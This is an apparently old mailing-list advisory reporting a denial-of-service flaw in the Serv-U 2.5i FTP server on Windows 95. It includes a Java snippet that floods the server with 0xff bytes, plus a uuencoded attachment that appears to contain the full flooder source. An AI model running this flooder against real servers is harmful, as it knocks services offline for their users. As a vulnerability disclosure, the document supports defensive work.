Serv-U 2.5i DoS

["Steven, Bates" <Craig () FREENET DE>]

Hi, I think I found another DoS issue in Serv-U 2.5i:

I've downloaded the "Fixed" version of Serv-U yesterday. I installed it on one
of my pc's and started %windir%\RSRCMTR.EXE to see how many resources are used
when I flood it. Then I started to play around with the server:

Ftp> open server
Connected to server.
220 Serv-U FTP-Server v2.5i for WinSock ready...

I coded a little java application which flooded the server with 0x00 chars,
but at least that bug was fixed.
So I tried other chars and found out, that 0xff was a good choice. The
application just sends out 0xff chars in a never ending loop (I added a
Counter to see how much chars are needed to block/crash it).

 char nuke=0xff;
 int Counter=0;

 while(true)
  {
   sout.print(nuke);
   Counter++;
   if(Counter%10000==0)
    System.out.println(Counter+" 0xff sent");
  }


I started it, and the resources got lower and lower. When about 290000 0xff
chars were sent, there was a popup (I am sure every Win9x user saw it once)
which said that 90% of the resources were already used, and that some programs
should be closed. I tried to click the "OK" button, but the popup did not
react. I also noticed that the mouse cursor was moving strange... I tried to
login from an other pc:

Ftp>open Server
Connected to server.
Connection closed by remote host.

but as you can see, it did not work - the connection closed after the timeout.
Then I stopped the java application with STRG-C, the resource icon became
green, the popup dissappeared (it finally noticed that I had clicked on it)
and the server was working fine again.

While writing this, I was testing the flooder, but after seeing the popup on
the screen, I forgot to stop the flooder. When I finally noticed that, I
stopped it - it had already sent about 2,5 Million 0xff chars to the server. I
tried to connect to the ftpd, but I couldn't - I was connected and
immediatley(!) disconnected. I tested it again, but this only works sometimes,
i have now idea why.

I do not know why the server acts like this, but this issue should really
should be fixed.

!! THE FLOODER DOES NOT WORK, IF THE SERV-U ICON IS JUST IN THE TRAY, YOU NEED
TO SEE THE LOGGING SCREEN !!
!! I was only able to repoduce this behaviour on Win95, on Win98 it did not
seem to do anything !!


[Craig]
http://www.HaQuarter.De/


begin 600 ServU25i.java
M:6UP;W)T(&IA=F$N:6\N*CL-"FEM<&]R="!J879A+FYE="XJ.PT*#0IP=6)L
M:6,@8VQA<W,@4V5R=E4R-6D-"B![#0H)#0H)<W1A=&EC(%-T<FEN9R!397)V
M97([#0H)#0H)<W1A=&EC(%-O8VME="!S/6YU;&P[#0H@('-T871I8R!0<FEN
M=%-T<F5A;2!S;W5T.PT*("!S=&%T:6,@1&%T84EN<'5T4W1R96%M('-I;CL-
M"B`@#0H@('-T871I8R!C:&%R(&YU:V4],'AF9CL-"B`@#0H@("`-"B`-"B!V
M;VED($AO;&5%:6YG86)E;B@I#0H@"7L-"B`@('1R>0T*("`@"7L-"@D@"2`@
M#0H)(`D@(%-Y<W1E;2YO=70N<')I;G0H(EQN0W)A:6<G<R!397)V+54@1E10
M(#(N-6D@8FQO8VME<EQN16YT97(@4V5R=F5R/B(I.PT*"2`)("!$871A26YP
M=713=')E86T@:6X@/2!N97<@1&%T84EN<'5T4W1R96%M("A3>7-T96TN:6XI
M.PT*"2`)("!397)V97(]:6XN<F5A9$QI;F4H*3L-"@D@"2`@"2`)(`T*"2`)
M?0T*("`@("!C871C:"`H24]%>&-E<'1I;VX@92D@>U-Y<W1E;2YE<G(N<')I
M;G1L;BAE*3M]#0H@"7T-"@T*(`T*(`T*('9O:60@5F5R8FEN9&4H*0T*(`E[
M#0H@"2!T<GD-"B`)"7L@#0H@"2`@("`-"B`)("`@(',@/2!N97<@4V]C:V5T
M*%-E<G9E<BP@,C$I.PT*"2`@("!S:6X@/2!N97<@1&%T84EN<'5T4W1R96%M
M("AS+F=E=$EN<'5T4W1R96%M*"DI.PT*"2`@("!S;W5T(#T@;F5W(%!R:6YT
M4W1R96%M("AS+F=E=$]U='!U=%-T<F5A;2@I*3L-"@D@("`@#0H)("`@(&EN
M="!#;W5N=&5R/3`[#0H)("`@('=H:6QE*'1R=64I#0H@"2`)("`@>PT*(`D@
M"2`@(`ES;W5T+G!R:6YT*&YU:V4I.PT*(`D@"2`@("!#;W5N=&5R*RL[#0H@
M"2`)("`@(&EF*$-O=6YT97(E,3`P,#`]/3`I4WES=&5M+F]U="YP<FEN=&QN
M*$-O=6YT97(K(B`P>&9F('-E;G0B*3L-"B`)(`D@("!]#0H)("`@("`)("`@
M("`@(`T*"2`@('T-"B`@("!C871C:"`H24]%>&-E<'1I;VX@92E[?0T*#0H@
M"7T-"B`-"B`-"B`-"B!P=6)L:6,@<W1A=&EC('9O:60@;6%I;BA3=')I;F=;
M72!A<F=S*0T*"7L-"B`)(`T*(`D@4V5R=E4R-6D@;F]W/6YE=R!397)V53(U
M:2 () I PT*"2!N;W<N2&]L945I;F=A8F5N*"D[#0H)(&YO=RY697)B:6YD92@I
@.PT*"2`)#0H)?0T*#0I]#0H@("`@("`@("`@("`@(`EO
end